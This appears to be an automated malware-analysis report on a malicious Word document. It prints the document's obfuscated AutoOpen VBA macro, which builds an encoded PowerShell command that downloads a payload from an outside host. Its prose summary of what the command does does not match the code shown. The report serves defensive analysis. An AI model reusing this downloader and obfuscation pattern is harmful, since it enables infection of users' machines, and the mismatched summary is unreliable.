Office (OLE) malware analysis — malicious · 6fd407ae1d10b4dd

MALICIOUS

Office (OLE)

162.5 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: c159ab9699c7313cae66b7c116e7dd59 SHA-1: 20479bd6fd5fa142823837291addec2bffc684c6 SHA-256: 6fd407ae1d10b4dd08ecc90c79952b27db463c5cc86b8988a26ecbcb288f2bb6

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes a Shell() call to execute a PowerShell command, which is obfuscated but reconstructs to 'powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\Public\Documents\a.dll"'. This indicates the macro's purpose is to download and execute a second-stage payload from a remote source, likely leading to further system compromise.

Heuristics 6

ClamAV: Doc.Malware.Sagent-6697295-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Sagent-6697295-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 215874 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	215874 bytes
SHA-256: `c17b7490895b3bb2d6cd2759f31275493549d985961919812ee50ec1c0080d2e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Const GYTeTaPyLUfICYzylEwOKEcKOBuhufuaaRaVO = 0 Sub AutoOpen() On Error Resume Next wylaXojvEqIrziNyKiVYtEr = "d." + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "x" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + " /c p^O^w^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^R^s^H^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^L^L^.^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^x^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^5^A^H^Q^A^Z^Q^B^u^A^H^g^A^b^A^B^" Dim QOhAtoiATItUMofUDUmiStUdUaYzCUWUhopYPI(4) If 10 = 10 + (7 * 0) Then QOhAtoiATItUMofUDUmiStUdUaYzCUWUhopYPI(0) = CLng(790) End If QOhAtoiATItUMofUDUmiStUdUaYzCUWUhopYPI(1) = Sqr(7) QOhAtoiATItUMofUDUmiStUdUaYzCUWUhopYPI(2) = Month(790790) QOhAtoiATItUMofUDUmiStUdUaYzCUWUhopYPI(3) = Fix(790.7) Dim muFEhoWEtYZERmEjoXiCiMuHGorIKYCeFa(4) Dim QIhiJYFutEMADyVIdaHOXUpxehacaJiVaNUDuaAMIs(4) If 12 = 12 + (10 * 0) Then QIhiJYFutEMADyVIdaHOXUpxehacaJiVaNUDuaAMIs(0) = CLng(2934) End If QIhiJYFutEMADyVIdaHOXUpxehacaJiVaNUDuaAMIs(1) = Sqr(10) QIhiJYFutEMADyVIdaHOXUpxehacaJiVaNUDuaAMIs(2) = Month(29342934) QIhiJYFutEMADyVIdaHOXUpxehacaJiVaNUDuaAMIs(3) = Fix(2934.1) Dim rYNuiYRetirEQqucEVANZgIFIxipYqapAfoMew(4) If 13 = 13 + (2 * 0) Then rYNuiYRetirEQqucEVANZgIFIxipYqapAfoMew(0) = CLng(2740) End If rYNuiYRetirEQqucEVANZgIFIxipYqapAfoMew(1) = Sqr(2) rYNuiYRetirEQqucEVANZgIFIxipYqapAfoMew(2) = Month(27402740) rYNuiYRetirEQqucEVANZgIFIxipYqapAfoMew(3) = Fix(2740.2) If 10 = 10 + (5 * 0) Then Dim jIFUhYvuKHEHehuzxUwaQEkyrIdisaQdoQoGIbUN(4) If 13 = 13 + (9 * 0) Then jIFUhYvuKHEHehuzxUwaQEkyrIdisaQdoQoGIbUN(0) = CLng(4372) End If jIFUhYvuKHEHehuzxUwaQEkyrIdisaQdoQoGIbUN(1) = Sqr(9) jIFUhYvuKHEHehuzxUwaQEkyrIdisaQdoQoGIbUN(2) = Month(43724372) jIFUhYvuKHEHehuzxUwaQEkyrIdisaQdoQoGIbUN(3) = Fix(4372.9) muFEhoWEtYZERmEjoXiCiMuHGorIKYCeFa(0) = CLng(5274) End If Dim NoVEFUJesyDIfIneGsAMugoPyTUVTedeWJeCU(4) If 10 = 10 + (3 * 0) Then NoVEFUJesyDIfIneGsAMugoPyTUVTedeWJeCU(0) = CLng(5065) End If NoVEFUJesyDIfIneGsAMugoPyTUVTedeWJeCU(1) = Sqr(3) NoVEFUJesyDIfIneGsAMugoPyTUVTedeWJeCU(2) = Month(50655065) NoVEFUJesyDIfIneGsAMugoPyTUVTedeWJeCU(3) = Fix(5065.3) Dim BuTuBuNUVudubyXhIPExuJatOupABoz(4) If 10 = 10 + (7 * 0) Then BuTuBuNUVudubyXhIPExuJatOupABoz(0) = CLng(8171) End If BuTuBuNUVudubyXhIPExuJatOupABoz(1) = Sqr(7) BuTuBuNUVudubyXhIPExuJatOupABoz(2) = Month(81718171) BuTuBuNUVudubyXhIPExuJatOupABoz(3) = Fix(8171.7) muFEhoWEtYZERmEjoXiCiMuHGorIKYCeFa(1) = Sqr(5) Dim NGeBSehufWYqYpaTaDobiNIK(4) If 13 = 13 + (4 * 0) Then NGeBSehufWYqYpaTaDobiNIK(0) = CLng(7388) End If NGeBSehufWYqYpaTaDobiNIK(1) = Sqr(4) NGeBSehufWYqYpaTaDobiNIK(2) = Month(73887388) NGeBSehufWYqYpaTaDobiNIK(3) = Fix(7388.4) muFEhoWEtYZERmEjoXiCiMuHGorIKYCeFa(2) = Month(52745274) Dim hEZEWUTuSAZizewOtEfiNiTAkEKexAXim(4) If 10 = 10 + (8 * 0) Then hEZEWUTuSAZizewOtEfiNiTAkEKexAXim(0) = CLng(7460) End If hEZEWUTuSAZizewOtEfiNiTAkEKexAXim(1) = Sqr(8) hEZEWUTuSAZizewOtEfiNiTAkEKexAXim(2) = Month(74607460) hEZEWUTuSAZizewOtEfiNiTAkEKexAXim(3) = Fix(7460.8) muFEhoWEtYZERmEjoXiCiMuHGorIKYCeFa(3) = Fix(5274.5) Dim gadOziKATotEJsINElAsoxozEkuJiseDUb(4) If 10 = 10 + (9 * 0) Then gadOziKATotEJsINElAsoxozEkuJiseDUb(0) = CLng(6610) End If gadOziKATotEJsINElAsoxozEkuJiseDUb(1) = Sqr(9) gadOziKATotEJsINElAsoxozEkuJiseDUb(2) = Month(66106610) gadOziKATotEJsINElAsoxozEkuJiseDUb(3) = Fix(6610.9) MIUXIvAniKaNUGURufaayBiBankoaOROzeBisdyg = "z^A^G^0^A^Y^Q^B^4^A^C^4^A^Y^w^B^v^A^G^0^A^L^ ... (truncated)

SHA-256: c17b7490895b3bb2d6cd2759f31275493549d985961919812ee50ec1c0080d2e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const GYTeTaPyLUfICYzylEwOKEcKOBuhufuaaRaVO = 0
Sub AutoOpen()
On Error Resume Next
wylaXojvEqIrziNyKiVYtEr = "d." + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "x" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + " /c p^O^w^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^R^s^H^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^L^L^.^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^x^" + Format(Chr(((20 + 5) * 4) + (10 / 10))) + "^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^5^A^H^Q^A^Z^Q^B^u^A^H^g^A^b^A^B^"


Dim QOhAtoiATItUMofUDUmiStUdUaYzCUWUhopYPI(4)

If 10 = 10 + (7 * 0) Then
QOhAtoiATItUMofUDUmiStUdUaYzCUWUhopYPI(0) = CLng(790)
End If
QOhAtoiATItUMofUDUmiStUdUaYzCUWUhopYPI(1) = Sqr(7)
QOhAtoiATItUMofUDUmiStUdUaYzCUWUhopYPI(2) = Month(790790)
QOhAtoiATItUMofUDUmiStUdUaYzCUWUhopYPI(3) = Fix(790.7)
Dim muFEhoWEtYZERmEjoXiCiMuHGorIKYCeFa(4)
Dim QIhiJYFutEMADyVIdaHOXUpxehacaJiVaNUDuaAMIs(4)

If 12 = 12 + (10 * 0) Then
QIhiJYFutEMADyVIdaHOXUpxehacaJiVaNUDuaAMIs(0) = CLng(2934)
End If
QIhiJYFutEMADyVIdaHOXUpxehacaJiVaNUDuaAMIs(1) = Sqr(10)
QIhiJYFutEMADyVIdaHOXUpxehacaJiVaNUDuaAMIs(2) = Month(29342934)
QIhiJYFutEMADyVIdaHOXUpxehacaJiVaNUDuaAMIs(3) = Fix(2934.1)

Dim rYNuiYRetirEQqucEVANZgIFIxipYqapAfoMew(4)

If 13 = 13 + (2 * 0) Then
rYNuiYRetirEQqucEVANZgIFIxipYqapAfoMew(0) = CLng(2740)
End If
rYNuiYRetirEQqucEVANZgIFIxipYqapAfoMew(1) = Sqr(2)
rYNuiYRetirEQqucEVANZgIFIxipYqapAfoMew(2) = Month(27402740)
rYNuiYRetirEQqucEVANZgIFIxipYqapAfoMew(3) = Fix(2740.2)
If 10 = 10 + (5 * 0) Then
Dim jIFUhYvuKHEHehuzxUwaQEkyrIdisaQdoQoGIbUN(4)

If 13 = 13 + (9 * 0) Then
jIFUhYvuKHEHehuzxUwaQEkyrIdisaQdoQoGIbUN(0) = CLng(4372)
End If
jIFUhYvuKHEHehuzxUwaQEkyrIdisaQdoQoGIbUN(1) = Sqr(9)
jIFUhYvuKHEHehuzxUwaQEkyrIdisaQdoQoGIbUN(2) = Month(43724372)
jIFUhYvuKHEHehuzxUwaQEkyrIdisaQdoQoGIbUN(3) = Fix(4372.9)
muFEhoWEtYZERmEjoXiCiMuHGorIKYCeFa(0) = CLng(5274)
End If
Dim NoVEFUJesyDIfIneGsAMugoPyTUVTedeWJeCU(4)

If 10 = 10 + (3 * 0) Then
NoVEFUJesyDIfIneGsAMugoPyTUVTedeWJeCU(0) = CLng(5065)
End If
NoVEFUJesyDIfIneGsAMugoPyTUVTedeWJeCU(1) = Sqr(3)
NoVEFUJesyDIfIneGsAMugoPyTUVTedeWJeCU(2) = Month(50655065)
NoVEFUJesyDIfIneGsAMugoPyTUVTedeWJeCU(3) = Fix(5065.3)
Dim BuTuBuNUVudubyXhIPExuJatOupABoz(4)

If 10 = 10 + (7 * 0) Then
BuTuBuNUVudubyXhIPExuJatOupABoz(0) = CLng(8171)
End If
BuTuBuNUVudubyXhIPExuJatOupABoz(1) = Sqr(7)
BuTuBuNUVudubyXhIPExuJatOupABoz(2) = Month(81718171)
BuTuBuNUVudubyXhIPExuJatOupABoz(3) = Fix(8171.7)
muFEhoWEtYZERmEjoXiCiMuHGorIKYCeFa(1) = Sqr(5)
Dim NGeBSehufWYqYpaTaDobiNIK(4)

If 13 = 13 + (4 * 0) Then
NGeBSehufWYqYpaTaDobiNIK(0) = CLng(7388)
End If
NGeBSehufWYqYpaTaDobiNIK(1) = Sqr(4)
NGeBSehufWYqYpaTaDobiNIK(2) = Month(73887388)
NGeBSehufWYqYpaTaDobiNIK(3) = Fix(7388.4)
muFEhoWEtYZERmEjoXiCiMuHGorIKYCeFa(2) = Month(52745274)
Dim hEZEWUTuSAZizewOtEfiNiTAkEKexAXim(4)

If 10 = 10 + (8 * 0) Then
hEZEWUTuSAZizewOtEfiNiTAkEKexAXim(0) = CLng(7460)
End If
hEZEWUTuSAZizewOtEfiNiTAkEKexAXim(1) = Sqr(8)
hEZEWUTuSAZizewOtEfiNiTAkEKexAXim(2) = Month(74607460)
hEZEWUTuSAZizewOtEfiNiTAkEKexAXim(3) = Fix(7460.8)
muFEhoWEtYZERmEjoXiCiMuHGorIKYCeFa(3) = Fix(5274.5)
Dim gadOziKATotEJsINElAsoxozEkuJiseDUb(4)

If 10 = 10 + (9 * 0) Then
gadOziKATotEJsINElAsoxozEkuJiseDUb(0) = CLng(6610)
End If
gadOziKATotEJsINElAsoxozEkuJiseDUb(1) = Sqr(9)
gadOziKATotEJsINElAsoxozEkuJiseDUb(2) = Month(66106610)
gadOziKATotEJsINElAsoxozEkuJiseDUb(3) = Fix(6610.9)
MIUXIvAniKaNUGURufaayBiBankoaOROzeBisdyg = "z^A^G^0^A^Y^Q^B^4^A^C^4^A^Y^w^B^v^A^G^0^A^L^
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.